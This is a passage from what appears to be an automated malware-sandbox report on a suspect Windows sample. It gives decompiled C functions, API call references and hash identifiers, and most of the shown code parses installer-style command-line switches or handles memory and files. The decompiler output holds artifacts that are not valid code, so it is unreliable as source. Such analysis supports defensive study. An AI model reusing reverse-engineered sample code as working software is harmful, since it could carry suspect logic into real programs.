                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0086623F
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                            • Part of subcall function 00866285: GetLastError.KERNEL32(00865BBC), ref: 00866285
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 381621628-0
                                                                                                                                                                                                          • Opcode ID: a49a7f280b31c715ea219f973d335aa7a159102400334fb2fc55f9b3aef23b22
                                                                                                                                                                                                          • Instruction ID: 005c5d7b99c4c6f778b8a37a9df928bdcab518bf22371b70bb5a7632580473c4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a49a7f280b31c715ea219f973d335aa7a159102400334fb2fc55f9b3aef23b22
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0B470600208ABD750EB789D02FBE37ACFB54700F420469A986D6181EDB499548651
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00864B60(signed int _a4) {
                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t15 = _a4 * 0x18;
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t15 + 0x868d64)) != 1) {
                                                                                                                                                                                                          					_t9 = FindCloseChangeNotification( *(_t15 + 0x868d74)); // executed
                                                                                                                                                                                                          					if(_t9 == 0) {
                                                                                                                                                                                                          						return _t9 | 0xffffffff;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *((intOrPtr*)(_t15 + 0x868d60)) = 1;
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *((intOrPtr*)(_t15 + 0x868d60)) = 1;
                                                                                                                                                                                                          				 *((intOrPtr*)(_t15 + 0x868d68)) = 0;
                                                                                                                                                                                                          				 *((intOrPtr*)(_t15 + 0x868d70)) = 0;
                                                                                                                                                                                                          				 *((intOrPtr*)(_t15 + 0x868d6c)) = 0;
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          0x00864b66
                                                                                                                                                                                                          0x00864b74
                                                                                                                                                                                                          0x00864b98
                                                                                                                                                                                                          0x00864ba0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864bac
                                                                                                                                                                                                          0x00864ba4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864ba4
                                                                                                                                                                                                          0x00864b78
                                                                                                                                                                                                          0x00864b7e
                                                                                                                                                                                                          0x00864b84
                                                                                                                                                                                                          0x00864b8a
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00864FA1,00000000), ref: 00864B98
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2591292051-0
                                                                                                                                                                                                          • Opcode ID: 9478063750c62dc36f76287f434d540c2149408d6b00f58ccccda5848e057e43
                                                                                                                                                                                                          • Instruction ID: cb925a06806331b21171753e96d666b8d1bc28a0644f9e1f003a63cb2779ddf0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9478063750c62dc36f76287f434d540c2149408d6b00f58ccccda5848e057e43
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F01231540B08DE47718F79CC00A56BBE5FA953B07121B2EE56ED3290DB70A481CBA0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E008666AE(CHAR* __ecx) {
                                                                                                                                                                                                          				unsigned int _t1;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                          				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                          					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}




                                                                                                                                                                                                          0x008666b1
                                                                                                                                                                                                          0x008666ba
                                                                                                                                                                                                          0x008666c7
                                                                                                                                                                                                          0x008666bc
                                                                                                                                                                                                          0x008666be
                                                                                                                                                                                                          0x008666be

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,00864777,?,00864E38,?), ref: 008666B1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: 32ede9ee110bf041dc9b1880381c2e405e94e3f189a20ade896d8e6e8971e56d
                                                                                                                                                                                                          • Instruction ID: 4d8b1fcb9036e339c39a00647b46987f1a5e3c820f71227385ad8df5a77186ab
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32ede9ee110bf041dc9b1880381c2e405e94e3f189a20ade896d8e6e8971e56d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDB0927A226880826A240631BC295563842F7E123A7EA2B90F132D01E0DA7EC866D405
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00864CA0(long _a4) {
                                                                                                                                                                                                          				void* _t2;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                          				return _t2;
                                                                                                                                                                                                          			}




                                                                                                                                                                                                          0x00864caa
                                                                                                                                                                                                          0x00864cb1

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000000,?), ref: 00864CAA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                                          • Opcode ID: ec44afd1d685f9329c203e8a9d56c7a01d41ad0b4a8a5c7de5b73a96b93200e7
                                                                                                                                                                                                          • Instruction ID: d7d6fd2aecfe5ae812dd69256e85fbf2de8b12355f81e7dcd7a6372a2f6d172a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec44afd1d685f9329c203e8a9d56c7a01d41ad0b4a8a5c7de5b73a96b93200e7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDB0123204820CF7CF001FC2EC09F853F5DF7C4761F150000F60C490508AB294108A97
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00864CC0(void* _a4) {
                                                                                                                                                                                                          				void* _t2;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                          				return _t2;
                                                                                                                                                                                                          			}




                                                                                                                                                                                                          0x00864cc8
                                                                                                                                                                                                          0x00864ccf

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeGlobal
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2979337801-0
                                                                                                                                                                                                          • Opcode ID: ade3d1eb91a06fe9dc79e793bab600f1e338ae88bce8263e605bb6739812d81e
                                                                                                                                                                                                          • Instruction ID: 4261d49c11a57dd0a5ff21761954c2aa0b355ce3ca5f373b5609fe2ab8ef4e03
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ade3d1eb91a06fe9dc79e793bab600f1e338ae88bce8263e605bb6739812d81e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05B0123100010CF78F001B42EC088453F5DE6C02607010010F50C450218B7398118986
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                          			E00865C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				CHAR* _v265;
                                                                                                                                                                                                          				char _v266;
                                                                                                                                                                                                          				char _v267;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				CHAR* _v272;
                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                          				signed int _v296;
                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                          				int _t63;
                                                                                                                                                                                                          				char _t67;
                                                                                                                                                                                                          				CHAR* _t69;
                                                                                                                                                                                                          				signed int _t71;
                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                          				char _t79;
                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                          				void* _t87;
                                                                                                                                                                                                          				intOrPtr _t88;
                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                          				intOrPtr _t101;
                                                                                                                                                                                                          				CHAR* _t104;
                                                                                                                                                                                                          				intOrPtr _t105;
                                                                                                                                                                                                          				void* _t111;
                                                                                                                                                                                                          				void* _t115;
                                                                                                                                                                                                          				CHAR* _t118;
                                                                                                                                                                                                          				void* _t119;
                                                                                                                                                                                                          				void* _t127;
                                                                                                                                                                                                          				CHAR* _t129;
                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                          				void* _t142;
                                                                                                                                                                                                          				signed int _t143;
                                                                                                                                                                                                          				CHAR* _t144;
                                                                                                                                                                                                          				void* _t145;
                                                                                                                                                                                                          				void* _t146;
                                                                                                                                                                                                          				void* _t147;
                                                                                                                                                                                                          				void* _t149;
                                                                                                                                                                                                          				char _t155;
                                                                                                                                                                                                          				void* _t157;
                                                                                                                                                                                                          				void* _t162;
                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                          				char _t167;
                                                                                                                                                                                                          				char _t170;
                                                                                                                                                                                                          				CHAR* _t173;
                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                          				intOrPtr* _t183;
                                                                                                                                                                                                          				intOrPtr* _t192;
                                                                                                                                                                                                          				CHAR* _t199;
                                                                                                                                                                                                          				void* _t200;
                                                                                                                                                                                                          				CHAR* _t201;
                                                                                                                                                                                                          				void* _t205;
                                                                                                                                                                                                          				void* _t206;
                                                                                                                                                                                                          				int _t209;
                                                                                                                                                                                                          				void* _t210;
                                                                                                                                                                                                          				void* _t212;
                                                                                                                                                                                                          				void* _t213;
                                                                                                                                                                                                          				CHAR* _t218;
                                                                                                                                                                                                          				intOrPtr* _t219;
                                                                                                                                                                                                          				intOrPtr* _t220;
                                                                                                                                                                                                          				signed int _t221;
                                                                                                                                                                                                          				signed int _t223;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t173 = __ecx;
                                                                                                                                                                                                          				_t61 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                                          				_t209 = 1;
                                                                                                                                                                                                          				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                          					_t63 = 1;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                          					while(_t209 != 0) {
                                                                                                                                                                                                          						_t67 =  *_t173;
                                                                                                                                                                                                          						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                          							_t173 = CharNextA(_t173);
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_v272 = _t173;
                                                                                                                                                                                                          						if(_t67 == 0) {
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t69 = _v272;
                                                                                                                                                                                                          							_t177 = 0;
                                                                                                                                                                                                          							_t213 = 0;
                                                                                                                                                                                                          							_t163 = 0;
                                                                                                                                                                                                          							_t202 = 1;
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								if(_t213 != 0) {
                                                                                                                                                                                                          									if(_t163 != 0) {
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										goto L21;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t69 =  *_t69;
                                                                                                                                                                                                          									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t69 = _v272;
                                                                                                                                                                                                          										L21:
                                                                                                                                                                                                          										_t155 =  *_t69;
                                                                                                                                                                                                          										if(_t155 != 0x22) {
                                                                                                                                                                                                          											if(_t202 >= 0x104) {
                                                                                                                                                                                                          												goto L106;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                          												_t177 = _t177 + 1;
                                                                                                                                                                                                          												_t202 = _t202 + 1;
                                                                                                                                                                                                          												_t157 = 1;
                                                                                                                                                                                                          												goto L30;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											if(_v272[1] == 0x22) {
                                                                                                                                                                                                          												if(_t202 >= 0x104) {
                                                                                                                                                                                                          													L106:
                                                                                                                                                                                                          													_t63 = 0;
                                                                                                                                                                                                          													L125:
                                                                                                                                                                                                          													_pop(_t210);
                                                                                                                                                                                                          													_pop(_t212);
                                                                                                                                                                                                          													_pop(_t162);
                                                                                                                                                                                                          													return E00866CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                          													_t177 = _t177 + 1;
                                                                                                                                                                                                          													_t202 = _t202 + 1;
                                                                                                                                                                                                          													_t157 = 2;
                                                                                                                                                                                                          													goto L30;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_t157 = 1;
                                                                                                                                                                                                          												if(_t213 != 0) {
                                                                                                                                                                                                          													_t163 = 1;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t213 = 1;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L30;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L131;
                                                                                                                                                                                                          								L30:
                                                                                                                                                                                                          								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                          								_t69 = _v272;
                                                                                                                                                                                                          							} while ( *_t69 != 0);
                                                                                                                                                                                                          							if(_t177 >= 0x104) {
                                                                                                                                                                                                          								E00866E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                          								_push(_t221);
                                                                                                                                                                                                          								_t222 = _t223;
                                                                                                                                                                                                          								_t71 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                          								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                          									0x4f0 = 2;
                                                                                                                                                                                                          									_t75 = E0086597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									E008644B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                          									 *0x869124 = E00866285();
                                                                                                                                                                                                          									_t75 = 0;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								return E00866CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                          								if(_t213 == 0) {
                                                                                                                                                                                                          									if(_t163 != 0) {
                                                                                                                                                                                                          										goto L34;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										goto L40;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									if(_t163 != 0) {
                                                                                                                                                                                                          										L40:
                                                                                                                                                                                                          										_t79 = _v268;
                                                                                                                                                                                                          										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                          											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                          											if(_t83 == 0) {
                                                                                                                                                                                                          												_t202 = 0x521;
                                                                                                                                                                                                          												E008644B9(0, 0x521, 0x861140, 0, 0x40, 0);
                                                                                                                                                                                                          												_t85 =  *0x868588; // 0x0
                                                                                                                                                                                                          												if(_t85 != 0) {
                                                                                                                                                                                                          													CloseHandle(_t85);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												ExitProcess(0);
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t87 = _t83 - 4;
                                                                                                                                                                                                          											if(_t87 == 0) {
                                                                                                                                                                                                          												if(_v266 != 0) {
                                                                                                                                                                                                          													if(_v266 != 0x3a) {
                                                                                                                                                                                                          														goto L49;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                          														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                          														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                          														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                          														_t202 = _t50;
                                                                                                                                                                                                          														do {
                                                                                                                                                                                                          															_t88 =  *_t183;
                                                                                                                                                                                                          															_t183 = _t183 + 1;
                                                                                                                                                                                                          														} while (_t88 != 0);
                                                                                                                                                                                                          														if(_t183 == _t202) {
                                                                                                                                                                                                          															goto L49;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_t205 = 0x5b;
                                                                                                                                                                                                          															if(E0086667F(_t215, _t205) == 0) {
                                                                                                                                                                                                          																L115:
                                                                                                                                                                                                          																_t206 = 0x5d;
                                                                                                                                                                                                          																if(E0086667F(_t215, _t206) == 0) {
                                                                                                                                                                                                          																	L117:
                                                                                                                                                                                                          																	_t202 =  &_v276;
                                                                                                                                                                                                          																	_v276 = _t167;
                                                                                                                                                                                                          																	if(E00865C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                          																		goto L49;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		_t202 = 0x104;
                                                                                                                                                                                                          																		E00861680(0x868c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	_t202 = 0x5b;
                                                                                                                                                                                                          																	if(E0086667F(_t215, _t202) == 0) {
                                                                                                                                                                                                          																		goto L49;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		goto L117;
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																_t202 = 0x5d;
                                                                                                                                                                                                          																if(E0086667F(_t215, _t202) == 0) {
                                                                                                                                                                                                          																	goto L49;
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	goto L115;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													 *0x868a24 = 1;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L50;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_t100 = _t87 - 1;
                                                                                                                                                                                                          												if(_t100 == 0) {
                                                                                                                                                                                                          													L98:
                                                                                                                                                                                                          													if(_v266 != 0x3a) {
                                                                                                                                                                                                          														goto L49;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                          														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                          														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                          														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                          														_t202 = _t38;
                                                                                                                                                                                                          														do {
                                                                                                                                                                                                          															_t101 =  *_t192;
                                                                                                                                                                                                          															_t192 = _t192 + 1;
                                                                                                                                                                                                          														} while (_t101 != 0);
                                                                                                                                                                                                          														if(_t192 == _t202) {
                                                                                                                                                                                                          															goto L49;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_t202 =  &_v276;
                                                                                                                                                                                                          															_v276 = _t170;
                                                                                                                                                                                                          															if(E00865C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                          																goto L49;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                          																_t218 = 0x868b3e;
                                                                                                                                                                                                          																_t105 = _v276;
                                                                                                                                                                                                          																if(_t104 != 0x54) {
                                                                                                                                                                                                          																	_t218 = 0x868a3a;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          																E00861680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                          																_t202 = 0x104;
                                                                                                                                                                                                          																E0086658A(_t218, 0x104, 0x861140);
                                                                                                                                                                                                          																if(E008631E0(_t218) != 0) {
                                                                                                                                                                                                          																	goto L50;
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	goto L106;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t111 = _t100 - 0xa;
                                                                                                                                                                                                          													if(_t111 == 0) {
                                                                                                                                                                                                          														if(_v266 != 0) {
                                                                                                                                                                                                          															if(_v266 != 0x3a) {
                                                                                                                                                                                                          																goto L49;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																_t199 = _v265;
                                                                                                                                                                                                          																if(_t199 != 0) {
                                                                                                                                                                                                          																	_t219 =  &_v265;
                                                                                                                                                                                                          																	do {
                                                                                                                                                                                                          																		_t219 = _t219 + 1;
                                                                                                                                                                                                          																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                          																		if(_t115 == 0) {
                                                                                                                                                                                                          																			 *0x868a2c = 1;
                                                                                                                                                                                                          																		} else {
                                                                                                                                                                                                          																			_t200 = 2;
                                                                                                                                                                                                          																			_t119 = _t115 - _t200;
                                                                                                                                                                                                          																			if(_t119 == 0) {
                                                                                                                                                                                                          																				 *0x868a30 = 1;
                                                                                                                                                                                                          																			} else {
                                                                                                                                                                                                          																				if(_t119 == 0xf) {
                                                                                                                                                                                                          																					 *0x868a34 = 1;
                                                                                                                                                                                                          																				} else {
                                                                                                                                                                                                          																					_t209 = 0;
                                                                                                                                                                                                          																				}
                                                                                                                                                                                                          																			}
                                                                                                                                                                                                          																		}
                                                                                                                                                                                                          																		_t118 =  *_t219;
                                                                                                                                                                                                          																		_t199 = _t118;
                                                                                                                                                                                                          																	} while (_t118 != 0);
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															 *0x868a2c = 1;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L50;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_t127 = _t111 - 3;
                                                                                                                                                                                                          														if(_t127 == 0) {
                                                                                                                                                                                                          															if(_v266 != 0) {
                                                                                                                                                                                                          																if(_v266 != 0x3a) {
                                                                                                                                                                                                          																	goto L49;
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                          																	if(_t129 == 0x31) {
                                                                                                                                                                                                          																		goto L76;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		if(_t129 == 0x41) {
                                                                                                                                                                                                          																			goto L83;
                                                                                                                                                                                                          																		} else {
                                                                                                                                                                                                          																			if(_t129 == 0x55) {
                                                                                                                                                                                                          																				goto L76;
                                                                                                                                                                                                          																			} else {
                                                                                                                                                                                                          																				goto L49;
                                                                                                                                                                                                          																			}
                                                                                                                                                                                                          																		}
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																L76:
                                                                                                                                                                                                          																_push(2);
                                                                                                                                                                                                          																_pop(1);
                                                                                                                                                                                                          																L83:
                                                                                                                                                                                                          																 *0x868a38 = 1;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															goto L50;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_t132 = _t127 - 1;
                                                                                                                                                                                                          															if(_t132 == 0) {
                                                                                                                                                                                                          																if(_v266 != 0) {
                                                                                                                                                                                                          																	if(_v266 != 0x3a) {
